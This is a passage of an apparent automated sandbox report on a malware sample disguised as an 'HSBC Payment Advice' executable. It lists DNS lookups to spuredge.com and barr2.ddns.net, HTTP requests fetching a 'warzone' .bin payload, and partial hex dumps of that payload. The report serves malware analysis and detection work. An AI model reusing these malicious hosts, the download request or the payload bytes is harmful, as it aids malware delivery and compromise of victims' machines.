                  Nov 25, 2021 18:53:00.343080044 CET5882053192.168.2.78.8.8.8
                  Nov 25, 2021 18:53:00.455828905 CET53588208.8.8.8192.168.2.7
                  Nov 25, 2021 18:53:02.707252979 CET6098353192.168.2.78.8.8.8
                  Nov 25, 2021 18:53:02.752720118 CET53609838.8.8.8192.168.2.7

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Nov 25, 2021 18:50:48.214104891 CET192.168.2.78.8.8.80x4373Standard query (0)spuredge.comA (IP address)IN (0x0001)
                  Nov 25, 2021 18:53:00.343080044 CET192.168.2.78.8.8.80x8081Standard query (0)spuredge.comA (IP address)IN (0x0001)
                  Nov 25, 2021 18:53:02.707252979 CET192.168.2.78.8.8.80x13e6Standard query (0)barr2.ddns.netA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Nov 25, 2021 18:50:48.326981068 CET8.8.8.8192.168.2.70x4373No error (0)spuredge.com38.103.244.107A (IP address)IN (0x0001)
                  Nov 25, 2021 18:53:00.455828905 CET8.8.8.8192.168.2.70x8081No error (0)spuredge.com38.103.244.107A (IP address)IN (0x0001)
                  Nov 25, 2021 18:53:02.752720118 CET8.8.8.8192.168.2.70x13e6No error (0)barr2.ddns.net194.5.97.4A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • spuredge.com

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.74978438.103.244.107443C:\Users\user\Desktop\HSBC Payment Advice.exe
                  TimestampkBytes transferredDirectionData
                  2021-11-25 17:50:48 UTC0OUTGET /warzone_JBBOxCEy72.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: spuredge.com
                  Cache-Control: no-cache
                  2021-11-25 17:50:49 UTC0INHTTP/1.1 200 OK
                  Date: Thu, 25 Nov 2021 17:50:48 GMT
                  Server: Apache
                  Last-Modified: Wed, 24 Nov 2021 19:03:36 GMT
                  Accept-Ranges: bytes
                  Content-Length: 115776
                  Connection: close
                  Content-Type: application/octet-stream
                  2021-11-25 17:50:49 UTC0INData Raw: 90 31 03 cf 80 65 33 6d 2e 69 a8 c3 32 17 22 69 13 1a de 7d b9 21 57 15 22 1f c1 fc 9e a6 32 19 7d 1e 80 92 3d 5f 34 88 f4 ac 46 9c 83 cc 5a 2d ab 30 bc 7f fb 4f d1 99 0f 64 1d b8 84 a2 d3 52 10 94 eb f0 ec 4e 74 0f 44 2c 91 51 bf 6b e4 97 11 2f 85 77 8a 53 e3 76 e8 0f 80 f8 99 62 21 6d 0e 5e 96 48 af 42 78 bb 25 a9 0e 8e 36 33 3d d6 06 ac a1 86 0a 87 0b 6e e6 c8 42 d7 bd f1 81 a0 3d 33 a9 ae 55 83 f3 78 7f 29 e8 53 f4 18 2d 7b 39 ba 0f 09 3d 3e 85 96 8a d3 61 8a 14 6e cc 73 53 69 fc 62 e7 a9 39 13 0d 10 63 2d b3 a1 3d a9 65 e7 08 15 d6 be 8f af ab db 10 e0 16 8c f8 f9 cf 68 34 8f a1 5c fd f0 d9 6c f0 3f a7 25 0c 67 f8 f8 d8 a5 c1 71 b6 e2 77 75 c4 fc 31 93 a4 f2 52 b4 90 4c 33 eb 64 36 0e dd 73 42 3a 44 b8 bd 13 a9 63 8c d0 19 0c 7f 7c 96 ca b0 d9 f7 32
                  Data Ascii: 1e3m.i2"i}!W"2}=_4FZ-0OdRNtD,Qk/wSvb!m^HBx%63=nB=3Ux)S-{9=>ansSib9c-=eh4\l?%gqwu1RL3d6sB:Dc|2
                  2021-11-25 17:50:49 UTC8INData Raw: 18 24 8d 90 f9 01 a9 0e 03 7b c7 d5 e8 1e ac a1 d9 54 dc c2 ad b3 43 ae 54 51 e4 d2 f6 64 1f ec 2b a7 60 71 6c a1 84 c9 5d 78 39 28 98 9c 4a e9 7d 19 b9 f7 ef eb be a9 07 a6 00 a2 45 a2 89 ea 28 91 56 01 81 c5 7b 06 0d f7 bf e3 cc f4 03 a0 20 10 45 88 a5 8f 56 5d 14 fe fa f6 f9 b5 be 85 a6 77 3e 5c 76 e7 dd 2f 4d 71 56 90 e1 05 20 1d dc eb 59 66 25 40 ba 2a 2b 85 63 60 9c 64 8d 5f ca 58 5a bb 40 ff 47 98 c4 05 28 a1 f0 e2 eb bc 0a ed a8 d3 09 af 9f 43 36 e6 94 fe 4d c5 35 48 d0 16 b9 de 48 e2 93 ce c8 39 2c ee 3d 56 08 8d 63 23 4c e1 86 5f 1f c7 98 1b 97 66 ff 06 91 7f 22 75 cc 53 0f 79 7c ab d2 16 70 50 66 f1 d6 e2 be e0 6d ba fd 03 a6 60 05 8b 94 56 b8 a4 85 ea f6 bd 8d 47 d2 e5 38 12 a2 1b 99 1d 67 d7 77 8f 1a 53 4f a4 2e 7c 31 66 45 a9 43 30 ed 03 2f
                  Data Ascii: ${TCTQd+`ql]x9(J}E(V{ EV]w>\v/MqV Yf%@*+c`d_XZ@G(C6M5HH9,=Vc#L_f"uSy|pPfm`VG8gwSO.|1fEC0/
                  2021-11-25 17:50:49 UTC15INData Raw: 99 f2 58 6a 33 8c c4 86 1e 2e 3b 54 90 ca 81 01 a6 72 e1 b8 d3 5f b5 83 27 a0 19 5b 36 e2 2a f2 b9 f3 60 76 80 71 4c c3 a7 37 3d 50 89 e8 1b 3a 5f f9 fa 5c f2 38 ea dd af 66 98 39 6e 80 2a 51 28 cd a6 76 08 ea cf 16 2a 40 72 f1 78 e2 37 be 4c 0d f3 03 f3 14 9e de 4f 4c e7 b5 f0 a0 0a ed 50 81 11 ca 5f 01 ea 5a 14 d3 d4 3b cf 68 10 b5 3b 16 8e 74 b7 16 ab 63 42 3a fc 77 9d 02 f8 ff 5b 01 60 7c 50 72 ed 03 f8 b1 77 50 95 6c f7 6b 28 ee b5 32 d8 64 90 eb 17 e4 46 2e df 8a ae 1e 72 7b 5a 12 6d c1 17 6e 50 10 30 1f cf 5b 88 41 9b c2 2e 83 54 68 61 5c be 4b 5c 74 70 f6 f6 a2 b8 07 85 c2 0f 7f 6f 8c 99 c2 40 87 1e 8b 77 5b a2 fd db 1c 5d 2b 3e a8 7d 0d e0 38 49 26 a0 aa e7 d3 21 91 db 15 9a 25 04 3d d4 01 c9 ce 85 a0 bf 02 8d ef 67 4f 2a 3e c3 b9 7f 3f 2d 57 6c
                  Data Ascii: Xj3.;Tr_'[6*`vqL7=P:_\8f9n*Q(v*@rx7LOLP_Z;h;tcB:w[`|PrwPlk(2dF.r{ZmnP0[A.Tha\K\tpo@w[]+>}8I&!%=gO*>?-Wl
                  2021-11-25 17:50:49 UTC23INData Raw: 25 1f 2e 3f 82 ef 85 4d 4e 65 0f 29 17 6b 2c 82 29 72 57 88 a3 78 5d c9 c0 c1 8a e1 6e d9 dc c7 43 83 1b 01 86 2b 1a 9f f6 a6 20 94 ea 89 6a 19 ac 12 8f 3e d5 d7 c3 a0 9c f1 09 5b 77 c5 85 cb c8 83 aa 93 b0 b4 a7 88 8d 6c db bc 09 66 8e 5b ea 9a 32 08 00 98 f4 c3 ad 39 88 e9 93 28 4a d8 2c 60 e8 93 23 25 b5 4a 40 c9 c9 ca 6d a0 bd f6 4a 5e 62 ea 19 a4 c0 7c 7a 69 eb 57 ec 26 b6 f5 57 a0 3b 91 49 b9 fe 60 54 5d 79 cf 40 ac 19 56 9c f9 68 73 ef 2f d9 1e 90 9b 61 c3 86 a2 e7 1f 9a 5b 22 5a 34 79 45 8d 36 e1 29 df 6b d4 bb 9d 45 c4 b9 d4 96 cf fc 18 09 fa 8e 75 21 d3 f5 dd fe be ba b7 ab fa b8 8d eb 3d c0 03 64 c1 5a 88 51 71 28 e2 96 11 e6 69 1e b3 9b 62 b8 eb 96 1b 7e 6e 68 48 7f 68 47 05 39 81 2b 5b 06 21 1f ab 8a 90 59 b8 93 f4 99 2d 94 22 da 13 a0 72 3b
                  Data Ascii: %.?MNe)k,)rWx]nC+ j>[wlf[29(J,`#%J@mJ^b|ziW&W;I`T]y@Vhs/a["Z4yE6)kEu!=dZQq(ib~nhHhG9+[!Y-"r;
                  2021-11-25 17:50:49 UTC31INData Raw: 6e 33 0b 73 4e e5 ec 06 70 59 32 e9 fd 22 1f 90 fd 97 72 3a 92 80 8b 52 6d 3f ba d7 62 fa bf 38 ea ee 3d e9 e6 1b 98 bd b4 95 4c 4c 75 e0 03 6b dc 58 9a b6 8b 79 df 2b 46 63 8e 2e b5 be 36 36 ad aa 73 af 32 47 9e 91 b6 53 08 08 d8 bb 10 3c 45 8b e1 f3 67 f8 ba 10 40 93 39 ab f7 e0 f7 ff bd 0b b3 06 d3 cf 7c cc 69 84 b6 a5 cb c8 27 ab c3 02 80 de 44 5f 04 e2 04 3e f0 f9 f9 05 83 c9 50 5a cd e7 dd d9 8c a9 ef 08 11 9b d6 10 ec 8e 33 4a 06 4c 82 b9 a2 9a 05 ac c4 82 a0 d4 fe 2f a9 23 9d 9a 2b fd 4b a9 ac 0b bf d3 a6 b1 20 8c ab 4d 22 03 73 64 35 fe 5c 73 03 cb 1f 84 77 cb 4b 61 a9 29 75 36 fc f8 44 10 b5 c2 74 22 83 2f a8 17 89 4b 19 07 8a 21 56 27 95 2f a3 3a cd 8e 65 37 b4 56 2d 6f 0b ae 49 cc 27 7d aa 21 5b 76 7a c4 67 35 61 0b eb b4 ab 4d 56 79 d2 9b 8a
                  Data Ascii: n3sNpY2"r:Rm?b8=LLukXy+Fc.66s2GS<Eg@9|i'D_>PZ3JL/#+K M"sd5\swKa)u6Dt"/K!V'/:e7V-oI'}![vzg5aMVy
                  2021-11-25 17:50:49 UTC39INData Raw: 70 d7 9c d9 05 cc dc 90 e5 e9 3c 3f fc 42 7e 2d e3 ad 98 07 5d 41 c1 25 28 da 03 27 43 38 24 e3 25 37 66 bc df e5 36 4d 60 12 a2 b9 98 cc 72 b5 ca 27 2f 10 02 9b ac cf f8 34 65 14 8e 93 e2 33 ac e9 cb c9 fa 75 44 bb 47 8f 8c 93 03 3e c1 a9 76 d5 f4 59 41 df 4e a2 02 08 de 71 09 26 8d 3c 0f 56 02 6f 73 ca e3 d4 91 01 91 d8 ed 63 f7 80 bc 86 b1 f4 fe 70 60 89 3a 0b 69 40 2b 78 ae b9 14 17 40 d8 a8 06 93 12 a8 af 37 24 e9 37 a2 a1 26 ad b5 49 09 9b 64 df 00 71 64 8e ac 0a 70 b4 db 45 36 02 73 1f 80 7a e3 f6 26 11 29 d9 ea b2 ac f7 dc c2 98 91 64 45 59 a8 a0 3c b1 9e 5c 66 bd f4 2f 41 b1 e6 9d ea 5c 92 71 db b2 c7 fb 94 8b f2 cc 48 d3 4a fa 64 d8 54 6a 9e 1e 92 8b f2 d1 97 7f c8 b1 39 11 d8 d6 31 84 7b 9a ba ff 72 b0 7f c7 06 bf 81 90 d6 e8 2f 00 b7 fe 5c 6e
                  Data Ascii: p<?B~-]A%('C8$%7f6M`r'/4e3uDG>vYANq&<Voscp`:i@+x@7$7&IdqdpE6sz&)dEY<\f/A\qHJdTj91{r/\n
                  2021-11-25 17:50:49 UTC47INData Raw: a9 11 3b ae 10 c1 e1 ee 66 0c 6a 93 d0 1b 55 b0 fc ec 97 e4 29 ad 95 8c f3 bb 01 b4 26 79 cf ec 5e d8 f8 94 65 40 74 e1 6b b4 ad 5d cd 03 fc 7a f9 56 36 1d 0d 37 eb d7 05 36 d2 24 34 f3 4a 2d 4e 00 8a 7b 6d 9e d6 89 4b 55 00 46 e7 ea 57 51 59 c0 61 fb e6 06 b5 54 c3 a2 c5 1a da 79 8f 51 43 a9 3d fa f9 46 de 0a 6f 7d a2 f2 24 e7 6c 40 6e ae 10 19 a9 83 41 a6 ec 88 75 d8 ae ca 40 0e 17 07 66 ef 6c 7d e6 be fe b7 50 c7 b8 c4 35 24 43 9a de e7 55 29 f9 29 61 89 84 35 0b 6e e6 fb 99 5a f0 f8 08 fd 9f a5 4e 10 dc 6a 4e 5d e7 f9 16 e0 bc f9 07 33 dd 8c cf 29 c2 1c ea 0c 51 d6 be 16 25 8d ef b0 cf 02 f2 f8 38 50 01 9d c5 c8 9b f2 08 67 33 69 85 c5 7c 98 75 db 7d 5a 0a 1b 6e c0 9b c9 24 a9 38 78 d8 b2 11 08 90 89 b7 dd 2f 09 71 06 f2 1e fa 40 58 ff 16 c8 b2 9b bf
                  Data Ascii: ;fjU)&y^e@tk]zV676$4J-N{mKUFWQYaTyQC=Fo}$l@nAu@fl}P5$CU))a5nZNjN]3)Q%8Pg3i|u}Zn$8x/q@X
                  2021-11-25 17:50:49 UTC55INData Raw: d8 23 21 e6 c8 b7 07 48 af 42 10 c7 c5 fd 0e e6 6a 54 7c d6 8b e1 a9 6e 62 c8 f4 91 6d bd 4e 5c 73 a0 69 73 1c 2c 13 2b 18 3f 12 a0 26 6e 16 4c 51 51 1e 52 50 44 62 75 a7 16 ad 1b 14 ee ca 27 9d b5 8d 1c 27 c2 d3 0b 2f 2c 3b 82 d2 c6 2d ed a3 ee d7 b1 e8 dc 6c 27 90 54 60 e5 8f 33 98 d8 e9 73 af 06 a0 b5 89 1b 9f 53 af 36 0c 7d 0a 39 79 4d 9e 89 79 2b 41 23 94 4f a9 29 a0 d9 7c 1e f1 50 66 ff 60 6f 1f a2 f0 28 7b fd f7 cf f7 a0 fa 87 7c c4 1f d3 de 4b ed 16 5e a6 19 fd 9e f4 ea cb f5 9d e0 a7 4c 08 ac 6d 5a 44 51 91 99 bc d6 23 76 2d dd ae 05 4b 24 4d c9 9b 68 6f 27 41 56 54 78 f0 e8 f9 9f f5 99 aa c6 13 86 e6 62 ba 1e 96 b7 10 3b cf 89 26 b6 8a de f2 53 46 cb 72 06 2c 7b 8c 18 7d 6c c3 d1 3d 98 19 e5 59 49 5d e4 91 90 c7 2f 46 b8 97 1b c0 da 1e 72 01 b9
                  Data Ascii: #!HBjT|nbmN\sis,+?&nLQQRPDbu''/,;-l'T`3sS6}9yMy+A#O)|Pf`o({|K^LmZDQ#v-K$Mho'AVTxb;&SFr,{}l=YI]/Fr
                  2021-11-25 17:50:49 UTC62INData Raw: d6 64 26 ca a3 a0 0d 5a 8f b2 ae 27 8c c5 05 8f c3 b0 fa d8 55 05 52 22 07 f6 e3 64 47 f7 06 db a3 e6 87 b3 e1 48 30 35 85 64 28 c6 69 fb c3 27 37 6c ce 0e 03 61 27 91 5c ea 46 52 d7 16 a6 e4 5f 79 da 3d b1 b1 58 39 ce 49 79 74 b6 82 f1 6e 79 89 85 48 0f fb 85 db e4 21 88 d3 6b f9 f2 15 71 6e 14 7e 2d 73 6f d2 49 a5 f3 a7 ce 29 da 4b 0e e8 f6 0c b3 da b8 33 8d 7f c9 f8 12 43 3b cf 64 33 fc d0 fe 46 a9 c4 79 6c 74 da 6e e5 53 1b bf 14 eb ae 84 53 e0 ef b1 6e 3b 6e 67 1b 88 a7 ff b0 2c f4 c1 b0 44 be a7 dc fd f3 31 12 6e f4 42 e4 f1 d2 b3 b3 cc d6 2a 6c 06 c8 1b 6e eb ee 40 f4 7d 81 1e ab 28 7c 29 7b 28 6c 22 8b f8 32 81 f0 ea 44 14 cf 9f 67 c4 40 b6 ba bd cd d2 09 3c ee 7a cf ea dc e4 e1 66 6d e2 30 e4 76 ca 6e b6 91 6f 7b 5e f4 0d f5 88 84 5c bb c6 a2 63
                  Data Ascii: d&Z'UR"dGH05d(i'7la'\FR_y=X9IytnyH!kqn~-soI)K3C;d3FyltnSSn;ng,D1nB*ln@}(|){(l"2Dg@<zfm0vno{^\c
                  2021-11-25 17:50:49 UTC70INData Raw: ac 93 bf 10 a1 c4 c7 3e 3e de 2c e5 95 a7 82 60 9c f8 2c 83 ef 10 c7 af 04 0f 38 d3 ff 9c 81 bb 82 4e 7f ab 91 33 10 1f 24 6c c0 cc e4 49 eb e3 72 aa 25 e5 93 88 e9 83 c4 e4 b9 65 5c 8d 84 0d f3 84 1e fe c5 ab 92 1e 62 57 2a c2 73 99 3c 84 87 5c 8a 76 5b ac 74 3f 71 f1 b4 dc 3d e6 20 98 b4 ca 22 5f 18 ea 03 dd 3a 25 29 4c 6a e4 33 51 7d 47 37 83 6b 7e 45 67 dd a4 4b 3a e8 4c b5 f6 62 95 7b b2 2c 7b 3e 66 eb bc 65 4a 26 46 c9 ad 3f 6f 94 2e fd 20 90 31 4b ee e2 ed 69 3e 6a 03 1e a9 ff c0 29 ad dd 12 25 19 08 2a 32 94 7f 12 ca 88 8a 1d 17 85 22 bb c4 b1 00 7d 54 cf 5d f9 f0 1c dc 49 e6 87 65 f9 56 04 80 13 41 7f 5f 15 3d c2 5e 2b 38 9d 48 36 73 28 12 f4 5c 26 57 4b 9c 5d 9f 31 78 c8 85 5f 8b 22 a4 41 f5 41 d1 22 72 e8 cf fc a6 d7 98 9a cb 86 ab 28 f2 9d c1
                  Data Ascii: >>,`,8N3$lIr%e\bW*s<\v[t?q= "_:%)Lj3Q}G7k~EgK:Lb{,{>feJ&F?o. 1Ki>j)%*2"}T]IeVA_=^+8H6s(\&WK]1x_"AA"r(
                  2021-11-25 17:50:49 UTC78INData Raw: 26 9c df 06 0a a1 67 e4 0d 1d d7 87 c2 e5 38 80 fe f4 02 9e ef 1b 0c 17 7a 66 aa 22 23 db 32 eb 0d 2b a4 ad 62 4d 79 60 8d 79 dd 9e 54 14 0e 35 6f 31 bf 69 bf 73 07 76 22 2f 7e d2 2a 84 0d d0 e8 ff 43 f0 bf 6a 63 27 54 1b eb 37 b0 16 e1 c1 84 d1 6d 37 c2 41 e9 d6 4e a5 c7 7d b7 9a c7 44 ee 0c 61 5c a1 76 11 c5 26 be 66 0a 38 f4 61 39 6c a5 21 fd 85 1f 51 e3 e2 7f d5 e4 82 6b c6 cb 30 3b 9e 6b eb 39 da aa 41 cc 4f 92 01 71 46 38 58 a0 2d e0 d5 7d de 9e b8 0b 2c 5b 20 5f 35 0a dd a5 e7 fa cf 6e 7f 1c 57 c9 ae 70 04 09 70 eb 25 30 f2 d0 9f 1a 50 91 84 22 f0 ee 59 75 36 94 12 84 20 a9 76 d1 cf b4 12 e9 a5 7b 80 ff 10 6a d9 54 06 ff c7 f2 a2 bb 82 89 b0 46 b9 95 b3 e5 41 d7 bb d5 ac 95 df c8 da b9 69 b2 3c c3 cd 96 d8 3b 73 9e b5 03 2b 50 55 15 b6 72 ae 65 d6
                  Data Ascii: &g8zf"#2+bMy`yT5o1isv"/~*Cjc'T7m7AN}Da\v&f8a9l!Qk0;k9AOqF8X-},[ _5nWpp%0P"Yu6 v{jTFAi<;s+PUre
                  2021-11-25 17:50:49 UTC86INData Raw: f9 b4 c9 d9 86 12 23 04 4f a8 63 36 03 05 57 59 de d3 11 bf 75 03 8c 18 ff 3b b9 8d 89 36 dd 25 c7 a5 0d 72 56 e0 66 c9 ef 2e ce 07 68 06 a2 56 5f 62 81 85 6e 71 50 8e cd e5 aa b8 de e9 96 ba 71 20 c6 c3 bb a3 61 53 27 71 72 32 25 16 db 2b 78 64 b6 e0 36 74 97 43 e4 59 e3 05 98 56 ef c2 31 07 ca 09 db ab 9d 38 10 47 5e f8 b7 46 98 9d ce 8b 8b a0 b9 37 05 73 50 1e bb 50 8c 27 3c 97 8a a6 f2 9f fb 1c 5a 12 38 70 dc ed 61 a2 2b 5c 46 08 f4 59 3a aa ae 1e ff 7c 41 bc 5c d3 7f ba fb 49 8b 4f 7d 65 2a 2c 85 3b 5a 28 d9 c5 aa 43 60 ab e5 1d b4 78 3d c8 b3 f1 03 10 e0 91 e7 51 e6 7e e7 28 74 19 3c 50 14 31 cc f0 44 a0 27 e7 28 64 20 7a 45 a9 36 7f 0b 70 f5 e9 40 e2 b0 d7 11 2f 30 c5 b7 8c 44 92 99 cd 41 a5 d2 bc fc 6e 77 6e 3e ec f3 32 0f f9 39 2b 61 a5 2e f4 62
                  Data Ascii: #Oc6WYu;6%rVf.hV_bnqPq aS'qr2%+xd6tCYV18G^F7sPP'<Z8pa+\FY:|A\IO}e*,;Z(C`x=Q~(t<P1D'(d zE6p@/0DAnwn>29+a.b
                  2021-11-25 17:50:49 UTC94INData Raw: dc cb cb a9 51 75 3b 28 fa 24 25 b8 91 dd a7 e1 8d e6 9f 40 82 8c 98 4b 6b 8c 01 b5 37 ff 8e e3 ca a3 22 02 4d e3 d4 b2 b0 8a 8f 0b 75 9a d8 ab 5c ad 33 75 99 d8 a4 cd 35 aa b5 09 8c 7d 2e 2d 95 4e 0e d1 75 e2 ae f6 0f 39 61 02 0a f1 08 52 39 8a 41 70 70 01 0d 9c c1 d9 eb 66 da 04 c5 f1 99 31 ad 8e 9b 2e bf e8 35 83 8f 80 11 5d ce ee f3 bf 3c 1b 6c 25 5f e2 62 72 d2 8d e5 da 5b 85 77 1d 50 b3 04 c7 6c e5 8b ea 51 13 23 6b 26 e2 48 bd 47 2f d2 4b ec 76 eb 55 33 b9 d4 41 c9 d5 d2 6f ea 7b 3e 87 bc 2a 96 bd f0 ca e5 61 62 56 ec 66 05 d4 d1 32 fd e9 1f 0a 3a 0e 60 20 bb 46 17 3b 37 b5 e4 d9 bd 36 9a 05 72 cb 72 53 2f df 07 64 da 0b 18 59 2e 64 63 93 81 19 dd 6d f0 18 27 f8 b3 af a4 c8 be 64 a6 79 fe 9d 9e c7 5a bd 34 fb 37 06 18 83 3f 15 b9 dc 18 d9 84 71 87
                  Data Ascii: Qu;($%@Kk7"Mu\3u5}.-Nu9aR9Appf1.5]<l%_br[wPlQ#k&HG/KvU3Ao{>*abVf2:` F;76rrS/dY.dcm'dyZ47?q
                  2021-11-25 17:50:49 UTC101INData Raw: 10 b7 3a a8 1f 80 f8 23 64 21 6d 20 2a f3 30 db 66 15 d5 25 a9 0e 8e 36 13 3d d6 82 ac a1 86 24 ee 6f 0f 92 a9 66 e2 bd f0 81 a0 b7 0c 13 a0 59 37 fa b5 70 a1 d9 7c 5f 5e 79 13 c0 e9 2f 79 af 55 e2 e4 c5 cc 25 88 01 61 a2 1c 57 6c 9e 07 3b db 4c 7d 03 0b 69 6c 83 8f 4a f3 72 f2 08 12 9f b3 82 a5 e3 fd 10 e0 46 8c f8 f9 9b 5c ac 3b eb 01 4b 44 e7 50 62 b9 25 3f 9e e1 11 cb 15 23 d0 24 40 05 34 50 f6 49 0e af 36 74 7f a1 5f ca 8b d7 f6 b0 39 4e e8 a5 71 19 0e 0f 0a 53 9f 0a b9 02 9e f9 07 a4 57 36 c8 a2 c4 77 78 97 39 6d fa 3a 32 64 b1 f5 99 43 cb a7 37 6c f3 a0 61 60 4a 1a 09 12 5d 2f c7 15 26 68 8e 79 fb f3 0c d2 99 c0 de 4a 89 b7 67 82 8e c2 b7 99 20 f5 1a 00 d5 a1 ff c6 03 a6 9f 72 ff 59 1b 6c 4c 6f e5 f6 93 af bf 6b 6e 7c 01 90 1b 14 50 b3 ef e9 80 1a
                  Data Ascii: :#d!m *0f%6=$ofY7p|_^y/yU%aWl;L}ilJrF\;KDPb%?#$@4PI6t_9NqSW6wx9m:2dC7la`J]/&hyJg rYlLokn|P
                  2021-11-25 17:50:49 UTC109INData Raw: 59 56 0c 10 45 c6 90 ec 4b 4f b8 ae f5 0f d7 f6 30 17 27 c8 c5 05 78 9b 09 ac 60 93 3f 9f 10 e3 cc d5 93 f4 03 4f fe b8 20 12 c0 38 6d d1 0c 0f 52 fa f3 c6 75 b3 91 4f 5a 34 f2 f2 22 33 2d 20 25 7a 28 51 22 c9 50 3d 4e 17 a6 b7 96 db f8 96 72 e4 cf e3 ba 68 fa 2c a1 af bf c0 4a 01 bd 2b cf e8 9e 67 4a 8b 20 0e 55 62 44 d1 cf 83 e4 87 20 6e 61 41 9b 6c 2d 2e 8a b7 f6 18 23 f0 fd fa e4 d2 c2 22 79 c2 91 81 39 b2 ea a6 2a 9c 75 6d 5a 81 27 fa 54 ee ca 29 a5 3a bc af cd 01 d5 59 d1 c5 21 24 ab ec a7 7c fe bc fc 89 d4 ab 46 97 a1 28 23 06 7c 3c 23 e2 88 7a 1f 51 e5 d8 ea 4e d5 a8 80 03 5d de 82 ef 71 81 bc ab 97 86 7b 35 32 d8 db b6 bf 95 5a a2 b4 9f aa 44 b5 8d 12 9e 0e cc 0c fd fc 15 cb 07 d5 a5 b6 7b 9d 0b db 80 54 a0 e6 ab f2 2c d5 31 ac b1 7d 4a bc e1 43
                  Data Ascii: YVEKO0'x`?O 8mRuOZ4"3- %z(Q"P=Nrh,J+gJ UbD naAl-.#"y9*umZ'T):Y!$|F(#|<#zQN]q{52ZD{T,1}JC


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.74982338.103.244.107443C:\Users\user\Desktop\HSBC Payment Advice.exe
                  TimestampkBytes transferredDirectionData
                  2021-11-25 17:53:00 UTC113OUTGET /warzone_JBBOxCEy72.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: spuredge.com
                  Cache-Control: no-cache
                  2021-11-25 17:53:00 UTC113INHTTP/1.1 200 OK
                  Date: Thu, 25 Nov 2021 17:53:00 GMT
                  Server: Apache
                  Last-Modified: Wed, 24 Nov 2021 19:03:36 GMT
                  Accept-Ranges: bytes
                  Content-Length: 115776
                  Connection: close
                  Content-Type: application/octet-stream
                  2021-11-25 17:53:00 UTC113INData Raw: 90 31 03 cf 80 65 33 6d 2e 69 a8 c3 32 17 22 69 13 1a de 7d b9 21 57 15 22 1f c1 fc 9e a6 32 19 7d 1e 80 92 3d 5f 34 88 f4 ac 46 9c 83 cc 5a 2d ab 30 bc 7f fb 4f d1 99 0f 64 1d b8 84 a2 d3 52 10 94 eb f0 ec 4e 74 0f 44 2c 91 51 bf 6b e4 97 11 2f 85 77 8a 53 e3 76 e8 0f 80 f8 99 62 21 6d 0e 5e 96 48 af 42 78 bb 25 a9 0e 8e 36 33 3d d6 06 ac a1 86 0a 87 0b 6e e6 c8 42 d7 bd f1 81 a0 3d 33 a9 ae 55 83 f3 78 7f 29 e8 53 f4 18 2d 7b 39 ba 0f 09 3d 3e 85 96 8a d3 61 8a 14 6e cc 73 53 69 fc 62 e7 a9 39 13 0d 10 63 2d b3 a1 3d a9 65 e7 08 15 d6 be 8f af ab db 10 e0 16 8c f8 f9 cf 68 34 8f a1 5c fd f0 d9 6c f0 3f a7 25 0c 67 f8 f8 d8 a5 c1 71 b6 e2 77 75 c4 fc 31 93 a4 f2 52 b4 90 4c 33 eb 64 36 0e dd 73 42 3a 44 b8 bd 13 a9 63 8c d0 19 0c 7f 7c 96 ca b0 d9 f7 32
                  Data Ascii: 1e3m.i2"i}!W"2}=_4FZ-0OdRNtD,Qk/wSvb!m^HBx%63=nB=3Ux)S-{9=>ansSib9c-=eh4\l?%gqwu1RL3d6sB:Dc|2
                  2021-11-25 17:53:00 UTC121INData Raw: 18 24 8d 90 f9 01 a9 0e 03 7b c7 d5 e8 1e ac a1 d9 54 dc c2 ad b3 43 ae 54 51 e4 d2 f6 64 1f ec 2b a7 60 71 6c a1 84 c9 5d 78 39 28 98 9c 4a e9 7d 19 b9 f7 ef eb be a9 07 a6 00 a2 45 a2 89 ea 28 91 56 01 81 c5 7b 06 0d f7 bf e3 cc f4 03 a0 20 10 45 88 a5 8f 56 5d 14 fe fa f6 f9 b5 be 85 a6 77 3e 5c 76 e7 dd 2f 4d 71 56 90 e1 05 20 1d dc eb 59 66 25 40 ba 2a 2b 85 63 60 9c 64 8d 5f ca 58 5a bb 40 ff 47 98 c4 05 28 a1 f0 e2 eb bc 0a ed a8 d3 09 af 9f 43 36 e6 94 fe 4d c5 35 48 d0 16 b9 de 48 e2 93 ce c8 39 2c ee 3d 56 08 8d 63 23 4c e1 86 5f 1f c7 98 1b 97 66 ff 06 91 7f 22 75 cc 53 0f 79 7c ab d2 16 70 50 66 f1 d6 e2 be e0 6d ba fd 03 a6 60 05 8b 94 56 b8 a4 85 ea f6 bd 8d 47 d2 e5 38 12 a2 1b 99 1d 67 d7 77 8f 1a 53 4f a4 2e 7c 31 66 45 a9 43 30 ed 03 2f
                  Data Ascii: ${TCTQd+`ql]x9(J}E(V{ EV]w>\v/MqV Yf%@*+c`d_XZ@G(C6M5HH9,=Vc#L_f"uSy|pPfm`VG8gwSO.|1fEC0/
                  2021-11-25 17:53:00 UTC129INData Raw: 99 f2 58 6a 33 8c c4 86 1e 2e 3b 54 90 ca 81 01 a6 72 e1 b8 d3 5f b5 83 27 a0 19 5b 36 e2 2a f2 b9 f3 60 76 80 71 4c c3 a7 37 3d 50 89 e8 1b 3a 5f f9 fa 5c f2 38 ea dd af 66 98 39 6e 80 2a 51 28 cd a6 76 08 ea cf 16 2a 40 72 f1 78 e2 37 be 4c 0d f3 03 f3 14 9e de 4f 4c e7 b5 f0 a0 0a ed 50 81 11 ca 5f 01 ea 5a 14 d3 d4 3b cf 68 10 b5 3b 16 8e 74 b7 16 ab 63 42 3a fc 77 9d 02 f8 ff 5b 01 60 7c 50 72 ed 03 f8 b1 77 50 95 6c f7 6b 28 ee b5 32 d8 64 90 eb 17 e4 46 2e df 8a ae 1e 72 7b 5a 12 6d c1 17 6e 50 10 30 1f cf 5b 88 41 9b c2 2e 83 54 68 61 5c be 4b 5c 74 70 f6 f6 a2 b8 07 85 c2 0f 7f 6f 8c 99 c2 40 87 1e 8b 77 5b a2 fd db 1c 5d 2b 3e a8 7d 0d e0 38 49 26 a0 aa e7 d3 21 91 db 15 9a 25 04 3d d4 01 c9 ce 85 a0 bf 02 8d ef 67 4f 2a 3e c3 b9 7f 3f 2d 57 6c
